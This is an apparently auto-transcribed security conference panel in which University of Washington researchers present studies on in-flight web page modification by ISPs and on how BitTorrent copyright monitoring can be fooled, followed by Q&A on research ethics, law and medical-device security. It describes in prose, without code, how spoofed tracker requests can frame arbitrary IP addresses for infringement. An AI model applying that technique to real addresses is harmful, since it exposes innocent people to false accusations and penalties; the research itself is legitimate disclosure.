we did was on, in collaboration actually, Nick Weaver is here in the audience, or I think he was in the audience, was on detecting in-flight page changes to our web pages. So many of you might have seen, and I guess in summer of 2007, there are lots of postings on slash dots and other media articles about ISPs and actually actively injecting ads into people's web pages. This was fairly early on in the process and what we at the University of Washington wanted to do was say, well, is this really occurring? How broadly is it occurring? What could the side effects of this be? And how might we actually be able to protect against this? And so the first step is to actually scientifically measure the phenomena. And we created a little infrastructure. We made our own web page. It had as little thing we called a trip wire in it. And so what would happen is that if a user went and visited our page, they would get a page with a little piece of JavaScript on it. They would actually do a self-inspection to make sure the page was unmodified. And so if an attacker actually, or if an ISP or someone else actually modified the page in flight, perhaps injecting an ad or doing something else, we would detect it and report it back to our server. And this way we could actually, if people came to our website, we could actually figure out whose web pages were being modified. Or sorry, which ISPs or which other parties are modifying web pages. So clearly what we need to do is we need to collect a lot of data. Data is the source of a lot of scientific analyses. And so what we did is we actually posted this page to dig since a mailing list, someone very graciously put it on slash. And 50,000 unique visitors came to our web page. And from that we got a glimpse of how this was broadly happening over the internet. And it turns out that this was really happening. Of the 50,000 web people that had unique IP addresses that visited our page, 650 of those did see changes, which is 1.3%. But still to me that's a fairly large number if we think about how many people are on the internet. 2.4 of these or a total of 16 were done by ISPs injecting ads. We actually saw some interesting indications that they might be trying to, blacklist or whitelist our tripwire code. But we did see this happening. And we have not actually redone this study, so I don't know what the current state is, but the ISPs were modifying as in flight. And we also found some interesting side effects that we didn't expect to happen. So as you know, many people here probably know about cross-site scripting attacks or vulnerabilities on these web pages would allow for these cross-site scripting attacks. Well, let's say that the web server, web page is actually not vulnerable to a cross-site scripting attack as the content developer intends. Well, it turns out that there are actually some software that people use on their own machine for legitimate purposes to maybe block ads or do other things that would actually modify the web pages in flight. And it turns out that some of these modifications to safe web pages actually introduce cross-site scripting vulnerabilities. And so basically what this means is that if you're using, sorry, they fixed the problem, but if you're using the old versions of AdMuncher or Proxamatron or maybe some of the other systems, the website itself might be safe, but if you use this third-party service or this third-party software, then actually the Bank of America or whoever you're going to was no longer safe anymore. I can go ahead and skip through this because I do wanna make sure we have enough time for discussion, but we also then created some techniques for defending against this that are hopefully more lightweight than standard cryptography. And I'll put those online and you know, these things are not perfectly robust against intelligent adversaries, but we're trying to strike a balance between security and safety. Or sorry, security and cost. But that'll let me actually now turn it over to Mike, which I think we'll talk about something else that you might be interested in. Hi, well yeah, I hope you'll be interested in it. Hi, I'm Mike and I work primarily on peer-to-peer systems and I'm gonna be telling you quickly about some measurements that we performed at the University of Washington of exactly how copyright enforcement agencies do monitoring and enforcement on these networks. And so there's a website URL up here that has more information about this project. So let's start off with something that probably everyone in this room knows, and that's why copyright agencies are interested in monitoring peer-to-peer networks. Well, quite simply, there's a lot of purported copyright infringement going on on these networks. And this is just a screenshot of a popular BitTorrent website that probably you all recognize where you can go off and download tons of movies for free. So of course this hasn't gone unnoticed by the people that produce these movies and they're interested in identifying people that are doing this and telling them, hey, stop that. So what are they doing today? Well, it's a pretty simple process really. Peer-to-peer monitoring today is three steps. First, these agencies crawl peer-to-peer networks participating in the protocol in the exact same way, mostly, that users do when they're downloading. They identify infringing users, and that's the crucial step, exactly how they're doing that, but for now let's just leave it abstract. And then once they've identified allegedly infringing users, they send a notice to ISPs called a DMCA takedown notice. You're all probably familiar with the DMCA. This was a law passed in the late 90s that defines new penalties for copyright infringement on the internet and it also defines ways to mediate reporting and takedown and so on and so forth. So let's start where we have direct experience and that's with actual complaints, the third step here. So as I mentioned, our study is a measurement study, so we went out and we wanted to actually try to attract complaints and this is some anonymized text from a real complaint that we received. At the website I showed at the beginning of the talk, I'll put the URL up at the end, there's this complete complaint. And so for us, we really were interested in this highlighted portion here, which is the key portion in my opinion, which is okay, we recognize what you did and you're doing something wrong, blah, blah, blah, to the best of our knowledge. So what does that really mean to the best of our knowledge? So that brings us to our work and our goal was to reverse engineer exactly what these monitoring and enforcement agencies are doing in one particular peer-to-peer network, that's BitTorrent, and our main result, there's more results in a paper, but the main result is that the monitoring that these organizations are using right now is inconclusive sometimes and even more surprising, it can be manipulated. So we were able to frame arbitrary network end points for copyright infringement and actually receive notices for that. So let's start off by talking about two ways that you might want to monitor these networks. I can think of at least two, there are probably more, but first you might think, well, this is pretty easy. If you want to find out who's downloading something on a peer-to-peer network, just go out, join the network, download stuff, and people that you receive data from, they must have gotten it from somewhere, so they're probably downloading. It turns out that's not the actual method that a lot of these organizations are using. They're instead using something that we call indirect identification and users are identified as sharing files based on the reports of a third party that's trusted. So let's talk a little bit more about how direct identification in BitTorrent would work. Many of you are probably familiar with what BitTorrent is, how it works. It's a large file distribution tool, and so a data source here, S, has a large file. It splits it up into four blocks. Those are the colored blocks at the top, and if some direct monitoring agent, M, wanted to see what was going on, well, the process of normal file distribution is that blocks are distributed from the source, redistributed from all the other peers in the mesh, and the monitoring agent and all the other peers get all the blocks and the distribution ends, and the monitoring agent knows, hey, I got some blocks from A, S, and B. So that's how you might monitor things directly, but to actually form this overlay mesh, there's a bootstrapping phase where a monitoring agent, M, needs to know, hey, who can I potentially get data from? Who are the potential S, A, and Bs? And so that brings us to the way that indirect identification works. So instead of actually downloading data from users directly, the bootstrapping phase of BitTorrent says, well, M can ask for a set of peers that it could potentially receive data from, and so that's how it joins. Joining the system, you contact a centralized entity called a tracker in this case, and you ask, who's currently participating in this distribution? Who's a potential replica for this data that I'm interested in? And so what we actually wanna do here is instead of saying that, you know, hey, I'm M, and I'm interested in joining this distribution, please give me a set of potential peers, which implicitly advertises you later as a data source. You wanna say, oh, well, instead of M, don't say that I'm going to be joining this. Say that some other arbitrary user, X is actually gonna join this swarm and give that IP address out later when other people ask for other replicas in the future. And so it turns out that there have been protocol extensions to BitTorrent, the BitTorrent tracker protocol, which actually allow us to implicate arbitrary IPs in this way. This is for supporting proxy servers and trackers and downloaders behind the same NAT. And so what is actually a spoofed request look like that implicates a user? Well, the BitTorrent tracker protocol is just some window dressing on HTTP, so it's actually as simple as a W get request. So if you wanted to implicate a.b.c.d here, after some post-processing of the torrent metadata, it's a request just like this. And so we went out and did this, and we wanted to underscore just how ridiculous it actually was to be relying on indirect reports as authoritative, so we wanted to see what was the most kind of ridiculous devices that we could actually generate DMCA complaints for. And so we worked with the university DMCA response team and we said, hey, we're gonna be trying to frame these IP addresses. If we get any complaints for them, those aren't legit, just send them to us. And so what did we frame? Well, we started with a printer, and we managed to actually get quite a few complaints for the printer, and we made this graphic, which I think is pretty fun for the website. But we also managed to implicate some other nonsense devices, so we got five complaints for a desktop machine, which was under our control the whole time, we know it wasn't running BitTorrent or anything. Three IP printers, we got nine complaints for all of those, and a wireless AP, which was not running NAT or anything, there were no users behind this, this was just a wireless AP with an IP address, and that was also apparently downloading things. Yeah, so we didn't want to try any IP addresses that we couldn't say these are bogus complaints because we were concerned about generating complaints for other users that were innocent, so one of the most interesting aspects of this work is the implications, and for me, there are three main takeaways. Today, there's a big problem in that there's kind of a wild, wild West style of enforcement. I mentioned that some organizations rely on indirect detection, they don't all rely on indirect detection, so some of them actually are downloading directly, but there's still not a lot of transparency in this whole process, and so as a result of that, ISPs are sometimes setting arbitrary penalties for receiving a DMCA takedown notice, it can mean you have to go to some class on copyright, a law if you're at a university, or you just get your network disconnected, or sometimes they just forward you the complaint, and that's the end of it. And monitoring agencies are using arbitrary methods, as I mentioned before, some use better methods than others, but it's hard to tell without doing this kind of work, and the potential for false positives, which we demonstrated experimentally, that again implies a need for standardization of this whole process and more transparency in it, so we can actually audit them openly. So, thanks very much, and I think Yoshi will say a few words next. Yeah, so as Mike said, I know you've been talking about the whole time, the purpose of this was to give kind of a glimpse of how the types of projects we do in academic security research and how we do it. But of course, we are only a very small subset of academic security community, and I suggest that if you're interested in this community, to go to like the ACM, CCS Conference, Computer and Communication Security Conference, in DSS, Network and Distributed Systems Security Symposium, I think it is IEEE Security and Privacy and Using Security. Using Security will be in Montreal this year, or next year, and associated with it is the workshop's hot sec, which is Hot Topics and Security, and Woot, which I think workshops on offensive technologies. And of course, we're more than happy to, we'd love to be delighted if you talk with us. So John will actually be talking about the counterpoints, and I just wanted to kind of summarize the academic point. The one thing to also keep in mind is that there's a peer review process that we have to go through. If you're unfamiliar with it, you submit a paper to a conference, it has to be a very well-polished paper with lots of experiments in it. Three or more people within the community will read this paper and provide reviews to you, and then a program committee will meet, and they will discuss the paper, and discuss all the papers or money of the papers, and then some subset are actually accepted. So if you're interested in this academic process, also please let us know. So I wanted to briefly mention, I know I think there's a talk at noon, unfortunately, but I wanted to briefly mention some of the other stuff that we're trying to do in the academic security community, and this is on the education front. And one of the things that struck me when I first came to academia, I don't know if I mentioned earlier, but I'm actually an assistant professor at the University of Washington, is how do you actually teach people to computer security? Like what is the fundamental thing that you want students to know and take away from your course that they can use 10 or 15 years down the line? And one of the things that comes blatantly obvious is that technology changes so quickly that if the course focused only on technology, the students might have difficulty addressing the security needs of future systems. And so what I tried to do was I tried to create a way to change people's thought process. Essentially, if there's one thing that I want students to take away from my course, is the ability to say, I see a new product out there, this miracle foo, and immediately start thinking not that the miracle foo looks great, I can't wait to use it, but that the miracle foo looks great, I want to use it, but I wonder if I could break it in this way. That's what I tried to get my students to do, and so I actually created a blog where multiple times during the course, the students had to look for new products that are recently being announced, or seeing in the media, and actually had to write a security review about it. Kind of like our academic studies, but a little bit lighter. Who are the adversaries are, what the assets are, et cetera. This was written up, Bruce Schneier wrote up a little bit about this, and you can read a little bit more about the things the students did and why we did the course, if you're interested, or maybe if you're also educators in the audience. People attacked elder care systems, on-star traffic lights, safety deposit box dorm rooms, smart pill boxes that are supposed to dispense pills that are periodic intervals, and whatnot. And if you Google any of our names in the class on the program, you'll be able to find this URL, or find our web pages that have this URL. But with that, I want to turn this over to John, which will kind of provide the industry perspective on the hopeful highway, future highway hopefully between academia and industry and others. Thank you very much. Just a few words about who I am. I'm co-founder of PGP Corporation. I've been doing OS security and crypto for many years. I worked at DEC for many years. I've worked at Apple, worked at Counterpane with both Yoshi and Bruce Schneier, and I've worked on a number of internet standards, including OpenPGP, DKIM, Anti-Spam, and so on. So how do we feel about this in industry? I mean, the smart people love this. And part of the problem is that stupidity is the second most common element in the universe after hydrogen. Even more than helium. And I want to help people get smart. It's a very similar thing to what Yoshi's doing with the undergraduate students. I want to help industry realize that this is actually good for you and that if you understand what's going on, this is nice. Part of the problem is that a lot of people will get an email message saying, hi, I'm Professor So-and-So from the University of Wherever and there's a pre-present print of this paper that we think you should look at and comment on and see if we've got any factual problems with it. And you get the sinking feeling in your stomach. You start to do other things and all of the little blood chemicals that set off the fight-or-flight impulses go off and that makes you stupid. And if you've seen any of these things where they talk about where you get the lawsuits coming in, this, that, that, this is the flight-or-flight impulse making you be stupid and you don't want to do that. What you should be saying is, can I be on your press release? Also, the market frequently punishes secure products. I once worked on a file server product and one of the advantages of ours was that it was much more secure than other ones and people weren't buying ours and we asked people why they didn't think this security stuff was important and one customer that we talked to said, well, why do I need this security stuff when I can just go out and buy a UPS and plug the thing into it? And as one of my colleagues put it, there's no arguing with logic like that. If people don't know about security problems, they don't value them and people will not pay for things that they don't value. And worse, when people get used to things that are not secure, it's extraordinarily hard to get them to upgrade to things that are secure because they presume that because they've been using this thing that is not secure for so long and apparently, it's like nobody's ever done this to me, then it's hard to get them to use the stuff that is good. The hacking itself is extraordinarily important because it shows the limitations of present thought. I mean, I find all of this absolutely amazing because it's, wow, I didn't think of that or in many cases, huh, I wondered if you could do that. It also shows what's important. And as I've said, it is widely believed that people don't buy security, people don't care about privacy. And so should we care ourselves? If people are not going to buy our system or they're going to buy the one that costs a nickel less and doesn't have security, then should we be caring about it too? It also helps those of us who build things because a lot of times something new comes out, it's being advertised as the greatest thing, you know, it's sliced bread 2.0, does it actually work? What are the downsides of it? You know, who's doing something that you look at it, you go, I wouldn't buy that. It's really nice to have independent voices who will go out and they will look at something. There's no better way to test a system than to get an independent set of eyes, better than any automated tools, better than anything else. Independent smart guys and gals are the best way to test something. Practice is always better than theory and the devious minds of people who start learning how to do this will do the best thing. I also think that peer review is vitally important. It not only adds weight to the results, it provides safety to the people who are doing it. You know, you can't say, oh, you guys had an axe to grind, it's like no, four people looked at this thing, you know, it helps everybody in there. It gets rid of the political debate of, you know, you only think that because, and it also gets people's attention. Some of the best hackers around our academics, some of the best researchers are hackers, I think the communities need to talk to them. I've testified to Congress and pointed out that the best researchers around are not just people at universities, they are people who come to places like DEFCON. So we wanna work with the scientists because the peer review helps science, it helps technology, it helps us build better things. I mean, at PGP, we put our source code up on the web for many years because we want peer review. We want anybody in the world to go look at it. It's kind of like saying, come into my kitchen, see if you like what's going on. I also hire researchers to test us. And when I heard about the debold results, I called up Avi Rubin and I said, would you like to work on my machine, take it into the back room, see what it'll do. And if you're smart, you will pay people to go do these hacks for you. And there are now starting to be an entire industry of people who are like these researchers who do research for pay because the way that I put it is, what's it worth to you to not be on the front page of the New York Times? And the smart people feel exactly the same way. It's that this makes us deliver better products. It makes us deliver things that you want. It makes you want things that we would deliver to you because if you don't want security, we're not gonna put it in there because it's gonna cost more. Next, your turn. Yes, thank you very much. So as John said, I believe that there's fantastic security work being done on all sides of the realm of computer security. Computer security is very large. Industry, this conference, academia, and we really wanna figure out how we can make this, again, the highway between these different communities and create further discussion. And so just to start things off, some questions we had that we thought you might be interested in or we are also interested in is what can and should we learn from you? How should we go about doing that? What do you think we could do better? What should we be looking at next? What shouldn't we be doing? That's also a very important question. And who, what, when, where is it, and why is it anything else that you might ask? So I think with that, I would like to open it up to the panel discussion. Yes? Oh, no, I was just gonna sit down so we can all share it, but you keep... So you said that was addressed to a specific point of John's, right? Yeah, so I guess maybe my, so for those of you who didn't hear, I guess the question was, there are lots of threats out there to different systems and what are the important ones and how can we address it? I actually don't have a simple answer to that. I think that at some, one of the things that we try to do from an academic perspective is just to understand, first thing is understand what are the threats and hopefully you can paint a big, let's complete a picture of possible of what all the different threats are and what they might compromise. And then we have to bump it up to a broader discussion. And so I think that the key thing is that when you think about these systems, whether it's a medical device or a voting machine, the technology doesn't exist in isolation but there's a huge ecosystem surrounding them. There's the doctors, there's the FDA, there's the patients themselves. It's a much bigger issue. And so we started the process by focusing on the technical part and now we're actually moving towards the bigger picture issues. We're actually talking with the FDA. We're trying to come to some sort of understanding and to come to this understanding, again it's something that I don't think a computer, I don't feel comfortable coming to a conclusion of what's the right level of security for a pacemaker or a medical pump by myself because I don't have the medical expertise. And so really it's just, you know, the research starts this dialogue with the other communities with broader expertise. I'll say that it's also the same sort of thing. I mean, one thing that you can do is that when you see somebody who does something similar to what you worry about. I mean, you know, you've seen what these guys do, they're gonna be the slides with their email addresses, send them an email and say, hey, have you guys ever considered blah, blah, blah, blah, blah? Sometimes it won't take, sometimes it will. I've suggested things to people a number of times before I get somebody to do something similar to some research that I like, and because this is the way that testing will go on. And when somebody comes up with something that is interesting, it starts opening up questions that we wouldn't have considered otherwise. People were accepting voting machines, just carte blanche until somebody actually started doing testing on them. I mean, the thing that's going on now is that this whole question of, we're all going to be subject to internet-controlled health care in the next 30 years. What should the FDA be doing about it? That question is only being started to ask now because of things like this. So, suggest to these guys something that would work. I mean, or something you're concerned about. And actually, Alexi suggested I might have actually misunderstood your question in my response. Yeah, yeah, I think we did. Okay. Okay, yeah. So, I think that this is on a case-by-case basis, but my, so let's say, my experience in the past is that if the issue can be, you know, sorry, I think that it's very important to be able to figure out some concise way to demonstrate or express the fact that this is actually an issue. And then to start talking broadly with the people, with other people in the community who might be able to corroborate your statement. So, I mentioned that for the medical devices, we have been talking with the FDA, and actually the people at the FDA are very supportive of this, and they understand the issues, they understand the challenges to addressing them also, and there are some fundamental challenges to it. But my short answer is, I think it's have to be a case, still a case-by-case basis, but still try to argue it as crisply as possible. Yeah, it's going to have to be case-by-case because it depends on who would be appropriate to do the right work. 10 years ago or so, there were people who did work, and they showed very interesting psychological work on how easy it is to induce repressed memories, and repressed memories were starting to become this new thing that people started to think was valuable, and serious research done on what was essentially hacking the human brain showed that this was questionable. There are all sorts of other things that we could start coming up with, and if you've got an idea, send it to somebody. Yeah, in the back? Oh, sorry, I guess there's one here? Yeah, yeah, so the question around is, you're analyzing some product or some system, and are you concerned about them doing some legal action to you? So the first thing I should say is that at least at the University of Washington, I think many other places, we do try to make sure that what we're doing is legal. So talk to a legal counsel before actually beginning a project, and there's things that we have done, or there's things that we have thought about doing for past research projects that we actually did not do, because again, we want to do the research, but at the same time, we want to make sure we uphold the law. That doesn't mean that some company might not issue a probe. So the question is, again, are we silenced? And I guess the truth is that we, so academics are provided extreme freedom on what they can do, and that's one of the reasons that I'm in academia is we can choose all these different projects. But in truth, the law is the law, and it's something that we try to, if we think that we shouldn't do something, then we can't. Yep, there's one. Ah, so actually there's two related questions that I might expand upon that. So the question was, how do you draw the line about this research is cool and I shouldn't go there? And there's two questions we have to address. One is, is this ethical to go there? And then the second one, is it legal to go there? I'm not a lawyer, so I can't decide is this legal or not, so I have to talk with the people at wherever I am about the legal aspects of it. And by the way, I should mention that any of you who are interested in going to academia, investigate how comfortable the legal department is with the computer science department, because different schools have different thresholds of tolerance. And the second question is, is this ethical or not? That's something we have to, it's very important to think about. And so I might mention this in the context of our medical device work, in that this is clearly related to people's lives. And is this, should we come out with our results about showing how to make an implantable defibrillator actually issue a large shock or not? And this actually kind of comes back to them, sorry I don't know the names, but the previous question of well, there's actually a lot of value in showing that there are security issues now for these medical devices when they're still moderately short range and not as sophisticated. And we felt that from an ethical perspective it was more important for us to do this now, and then wait for 10 or 15 years when these devices have evolved and perhaps haven't been considered. I'll also add in that one of the advantages that universities have is that many of them do in fact have a legal department that is very good at defending its researchers and that you can talk to, they can talk to upfront. There are also decades of work done on what are acceptable things for human experimentation, what are the appropriate protocols that medicine, psychology and sociology have to have developed themselves. So they have the resources to go to someplace and say, what do you think about this? And often what they will come back with is we don't like this thing, we don't like that thing, and if you would change this to that, then it's okay. And this lets them figure out exactly what they will do so that they can go right up to the line and say we also had this set of peers tell us that this was okay and that wasn't. And that helps everybody. So, one more comment about that. So in academia we kind of, like was said by John, we have the support of the whole lawyer team. So it might be actually a lot harder for a company to go after us. Second of all, it looks a little bit different in a press if your company goes after an educational institution as opposed to a hacker. So in that sense, we kind of get a lot more flack of what we can do. Also, if we actually want to work with a company, companies are much more willing to work with institutions than they are with rogue agents. So if we want to talk to a company and say, hey I think you guys are doing something wrong, how about we help you, how about you give us code and we look at it. They might look at that a little bit differently than if we have a whole university behind us as opposed to if you're by yourself. Jim and Orncher resource? Fantastic, yeah, good job, that's great. So I suspect that John might have more direct comments, but I'll comment, I could either start or, I mean, because you've actually hired. So at the highest level, I agree that this is a fundamental challenge and I'm not sure. So I think the ideal perspective that you paint is a great one where in the future everyone has a security mindset, the managers have the mindset themselves and they know the higher developers who have that mindset. I'm not actually sure, I think there's gonna be many, many steps for us to get to that point if we can in fact get to that point. I'm not sure what all those steps are going to be, but in the short term, again from my course, and I've actually got emails from other people who are interested in copying the same perspective, my hope of this course is that when these people are still working 10 or 15 years in the industry, they will have this mindset and when they see a new system, they probably won't know how to fix it or maybe even how to break it anymore, but they'll ask the question and then go out and hire the people that can fix it. And so it's a grassroots approach. Just give more and more people to think that way and maybe other classes at other universities will also be trying to teach people and give people an opportunity to think about security. So that is true, so I mean, it's not without challenge, but I'm still not sure exactly, so maybe I'll even open up to the audience. If there's any, and after John remarks, if he wants to, but if there's any suggestions on how to do this, I'd love to hear it because I've been racking my brain for five or 10 years on the subject of security and how can we get people to think about it more like we'd want them to? I think the bad news is it is going to take decades. But I'll even say that having a security mindset is very good to have some people who do that, but you wouldn't want everyone to do that because there are an awful lot of things that we wouldn't have that we all enjoy if we worried about the security. I mean, we would never get into cars if we worried about this. So we make risk decisions all the time and part of being a good security person is in fact saying this has gone a little bit too far and it doesn't need to be quite that secure because it's also got to have other properties. But we need to teach people, getting a small number of people who are into groups who can help it. There are many, many people in the industry who are in fact trying to get groups to do better jobs, sprinkling it around not in a security group, but throughout because that's what happens. The natural growth is first you pull the security people together and then you push them out. You start by centralizing and then you decentralize. Having more people learning this, having more people think that this is fun and this is interesting. I mean, this is part of why we're doing this panel is in fact that if we can get more of you thinking that this would be a fun thing to do in terms of writing academic style papers. There are an awful lot of things that hackers do where they will get a significant result and if we're lucky it will be a PowerPoint presentation and nobody does that. So I'll be the first one to say it here, learn to hack latex. I mean, there are so many web tutorials, go Google learning latex that it's pretty. If you put out one of these things, it really looks good and it looks like something and then you can start putting it up on your web page in that format and that's also one of those mental things that happens to people is if you learn to start producing your results in a short three to five page paper of I did this and here's what the results were, that also helps and that will continue to spread it out. Until those that are not security professionals demand secure products, organizations are not going to hire developers who create some security and therefore there's not going to be as much demand for the security knowledge in the university program so it's all supply and demand but we have to make sure that people who are not in this room know that they have to ask for secure products. You can't just buy for functionality if you have high risk security. Absolutely, that his comment was that it is something where we have to educate people to demand it and that's absolutely true. I mean, I used to say in the talks that I would give 10 years ago that lots of data is being lost every day those of us who are in the industry, we go out for drinks and we tell each other horror stories and it wasn't until the combination of consumers affecting law, making laws required to disclosure that we started learning everything that's going on and now consumers are demanding a level of security in a lot of systems that they weren't before and that's one of the other things that these hacks do is that people will say, oh my God, you can do that and once they do that you can then start saying, I could fix that but it would cost an extra dollar. Is this worth a dollar to you? And when they start saying, damn straight, I'd pay five then everyone will do it. So I might have one other response to that. So I think building on John's response, I think is great. So these hacks can raise awareness. But when he said that it reminded me of the fact that oftentimes these hacks do end up in the New York Times or in other types of media venues and that it creates this kind of short spurt of interest in the topic that it might last in the case of you voting it might not in the case of some other systems but maybe this is actually something that just as an idea that just came to my mind that the reporters in this audience might or other people talking about technology. So reporters have a great ability to reach a broad population. As a professor we can reach some population but reporters can reach many more and so maybe this might be a neat thing to try about in the future whenever talking about a new product to always talk about what could be the potential security issues in them. I don't know if this would fly from a press perspective but I think it would be, you know, they might be able to help us. Any other question? Yeah, those. So the devil's advocate in me says, okay, attack high profile subjects like senators. The comments were not representative of the university or the other from the panel. The problem is that senators can't use computers. So I'm not sure who was first, so maybe. I think that some of it is unstoppable but some of it isn't. I mean, the work that they've done on gestures with RFID devices is something that was completely new. I mean, you know, I certainly hadn't thought of that before and when you see that this is possible and all of you now have the ability to go tell people, you know, I saw people give a paper from University of Washington on how you could make an RFID tag activate if you waive it in a triangle or a square or, you know, or you do interpretive dance. And this is a worrisome problem. I mean, I have been, I'm a disadvocate of RFID passports and one of the things that I consider to be a huge threat is that there is nearly no way for it to not say, hi, I'm a passport. You know, and that means that there are a certain class of attacks that one could build off of that. This is going to be, you know, this is an open area for research is that these guys, other people who are doing research could go and build things. I know a bunch of people are doing RFID research and part of what could be done in the future is come up with ways to do privacy preserving things. And there are privacy preserving conferences. Yeah, so this group, Carl, did you, I, so I didn't have too much to add to that, but I wouldn't assume that the floodgates would just come wide open. There's, bad things happen when you start to assume various things, but I do think it is a very hard problem. And that's why we're really interested in looking at it now before it actually becomes pervasive. You, it's conceivable. You could do something fairly fancy with like cryptography or something, but at this point we really have no idea how to do it. We're trying a couple of things. Yeah, so I don't think it's gonna be a purely technological solution. There's a group at UW called the Society and Technology Group. And we've been looking at a variety of new technologies and how they interact with the law. They are deploying a new transit card in Seattle that we've found some interesting things about. And one of the original specification called for the University of Washington to be able to pull up trip histories with including your location, where you got on and off the bus for every student and every employee. And we were able to get them to roll that back in conjunction with the ACLU of Washington. So we are looking at both technological and some policy ways of addressing these challenges. I believe there's a question there for a while. Yeah, so I think the answer to the question were broadly, so for those of you who didn't hear, the on-star system, we talked about voting machines, we talked about pacemakers, the on-star system which controls cars, when are people gonna start breaking that? I guess at the highest level, there's a large number of research groups both here at the University of Washington and other places that are interested in understanding these emerging technologies. And in addition to cars, there's a whole bunch of other technologies that I'm sure are gonna be emerging, either are starting to or will in the future. And it just takes the right team, the right amount of time. So it's very hard to predict. I guess I would just mention last year at DEF CON, we were actually just in the heat of analyzing pacemakers and now this year where I've been able to actually talk about it. But yeah, I don't know, I can't predict exactly what I'd answer to that. Yep. So yeah, so for those of you who didn't hear, the question was, can I actually comment on which things we did not do because we were concerned about breaking the law? And the answer is I'm not, yeah. Okay. You'll have to talk to us after. Okay, so I think gentlemen, so unless someone else in the panel speaks up, I actually haven't looked at it yet. We have another student maybe who did the web tripwires work who might have been able to comment, but he's unfortunately here right now. So unfortunately I can't comment on that. Yeah, that's a good question. Yeah, is there any technology for which there's not a privacy concern? So I think first the gentleman back there and then in front, oh yes, thank you. So I didn't hear the second part of your question. So the answer to the first question, sorry, there were two questions about the medical device work, whether it's been published. And so the answer is yes. My colleague Ben Ransford presented this paper at the Oakland Security Conference in May of this year. And if you go to just Google for us and you find our website, you can get a copy of the paper from there. I know that we've talked to the FDA about kind of how we're gonna integrate the FDA and also device manufacturers about kind of what are the types of solutions towards this. As for pathology or post-mortem. Yeah, I don't, no one has expressed to us directly their interest in that. So there were definitely lots of people interested in this work. I think we're still a little bit early to, so we've been talking with lots of other academics who are interested in understanding and how to move into the security for medical devices. I know that also I know some people in industry are actually doing, they can't publish it because it got under NDA, but doing like pen testing against wireless medical devices. But we don't actually have any strong collaborations yet to report on. Yeah, thank you. Ah, so the question was being in academia, you do have a lot of flexibility, but the question was where does our funding come from and how does that affect it? I should mention I'm actually second year on the faculty at the University of Washington and the fact that I'm a second year means that basically when new professors become, when people become new professors, they're given a startup budget and the startup budget is kind of, they can use as they see fit to further their research. So with a lot of the work so far on like medical devices and some of the other things we've been talking about, you know, it's some of this, it's not restricted to like any particular funding agency, but from other types of working that were funded by NSF for other things that I didn't actually talk about here today. So can we use your startup funds to buy a sports car to hack on Star? Good question, okay, they have 10 minutes left, only if I get to drive it. Ah, so I couldn't quite hear the question, it was the question, how easy would it be to actually obtain a voting machine? It turns out they're not that easy to obtain, but the Princeton team, after our study came out, did actually obtain one and then did some attacks against that. But, you know, we were actually, you know, trying to figure out how to obtain ourselves but it was really not that easy to come by. Yeah, they haven't been. The Princeton team, it was very interesting because they had a volunteer give them one and they had a sort of cloak and dagger thing where they were quite literally told, come to New York, have a taxicab driver, drive you to this alleyway, beep three times, be wearing a trench coat and we will hand you a briefcase sort of thing. You know, and that's pretty much what exactly happened and they got the briefcase and in it was a voting machine. It was not illegal and this was one of the things of, before they did it, they contacted the Princeton legal team and ethics team to say, are we allowed to do it? And the legal and ethics team said, said all legal and ethical questionality in this is born by the people who are giving it to you, not to you. You know, and they were in fact asked, please don't break the machine. So, you know, it was used for a while and then returned back to where it came from. And it'll be used in the following election. No, just joking. So, okay, yep. Yep. Yeah, yeah, so that's a very good question. And it turns out there's actually a spectrum. So when I was talking about, you know, what the research needs to have, I mean, so I mentioned, I think there's a bullet on the slide that said, you can't just publish attacks themselves. They have to have some bigger picture issues. And so one of them was focusing on lessons. One is focusing on defenses and one of them is also focusing on the societal impact. And so for our voting paper, you know, I truly believe that, you know, for this particular paper, the scale was more towards, you know, this is an important, you know, societal issue. And in truth, the technical depth there was a lot of work, but the technical depth was not the same as for our work on trying to improve the security for medical devices. But to bounce back up to a higher level, you're right. There are a lot of systems out there that do very stupid things. And if one wanted to submit a paper on that to a security venue, you know, please let me know or please, you know, I'll be more than happy or other people in the security community will be more than happy to provide guidance on how to frame it. But oftentimes, you know, if the attack is just so stupid, then you know, the community, you know, might not accept it as a scientific publication. But if you can kind of wrap it around in a societal context or kind of, you know, talk about the defenses and maybe why some of the natural defenses didn't work or maybe why, you know, what led to this and how this problem might be more broader than just one particular application. So that may be a problem. Yeah, I mean, you know, these days, finding a buffer overflow in product X is not interesting science. It's been done. But I would argue that if you found something, write it up as a paper and, you know, and send it to the people whose product you broke. And if it's a PDF that's got, you know, the pretty latex fonts and things on it and you've got an abstract and you've got this and you say, I'm going to be submitting this to something and I would love to work with you, company X, that it's going to grab their attention in a way that it wouldn't have, you know, any other way and they're far going to be far more likely to cooperate with you. And if gosh darn, you know, you only publish that paper on your own website because it didn't get submitted, that's how you start developing your own individual cred. That, you know, you found X, you found Y and following these sorts of things, it's kind of like dressing the right way. And if you start dressing like an academic in the things that you write, then you will start getting people who will say, I'll help you get your results X and Y and you might put three of them together into, as Yoshi said, a societal thing or how I'm, you know, how good people respond to reports. That would be sort of a paper you could do. So I think we have time for at least two more questions. I'm first over there and then this one being next. Yeah, so the question was surrounding our medical device work and who we talked to. So I won't summarize each spin to a part but I'll just go and start answering them. The first is that we did definitely engage the FDA before we actually published this work. You know, the FDA is the US Food and Drug Administration. They're the one governing body in the United States that has an industry-wide perspective on the issues affecting medicine in general. And, you know, we worked with them primarily because, you know, we felt that the issues we uncovered, you know, while we focused on one device could potentially be much broader than that. And so we didn't want to just, you know, you know, it wasn't saying, you know, just fix this one product but really it's really, you know, the FDA and then the rest of the industry would need to kind of focus on this problem as a whole. And so we did work with them. And in fact, I think they were very receptive. So we actually had meetings now with, again with the FDA and with the medical device manufacturers and I think they understand that this is an issue. The big question is, you know, how do we actually, what actually does security and privacy mean for these devices? You know, when you actually have to trade off security with safety. And I'll mention this is just a brief example for you to think about. So for security, let's say I want to secure a pacemaker or an ICD. Well maybe I will, you know, put some cryptographic keys on it and only allow you to talk to an authorized programmer or an authorized equipment. Okay, like the equipment that you're prescribing doctor. And then what happens when you're, you know, in a foreign city and you get in an accident and the people in the ambulance or the people at the emergency room need to actually immediately turn off your device or change its settings. What do they do? Well they need a back door. And they need that back door for safety. And so well, why couldn't an adversary use that back door at the same time? And so that's one of the challenges for medical devices that I think will be particularly hard to go through. But I hope that was okay. And in one minute or two, let's laugh, yeah. I think we agree completely. The comment was that how do you get people aware of this? And he suggested, you know, there's legislation, there's insurance. I mean, you know, I have been saying recently that we didn't get people to wear seat belts above a rate of 15 to 20% in the population. When the danger is your face goes into a piece of glass, it's really easy to imagine it even. And the rates of using seat belts were very low until there were laws and fines. And you know, 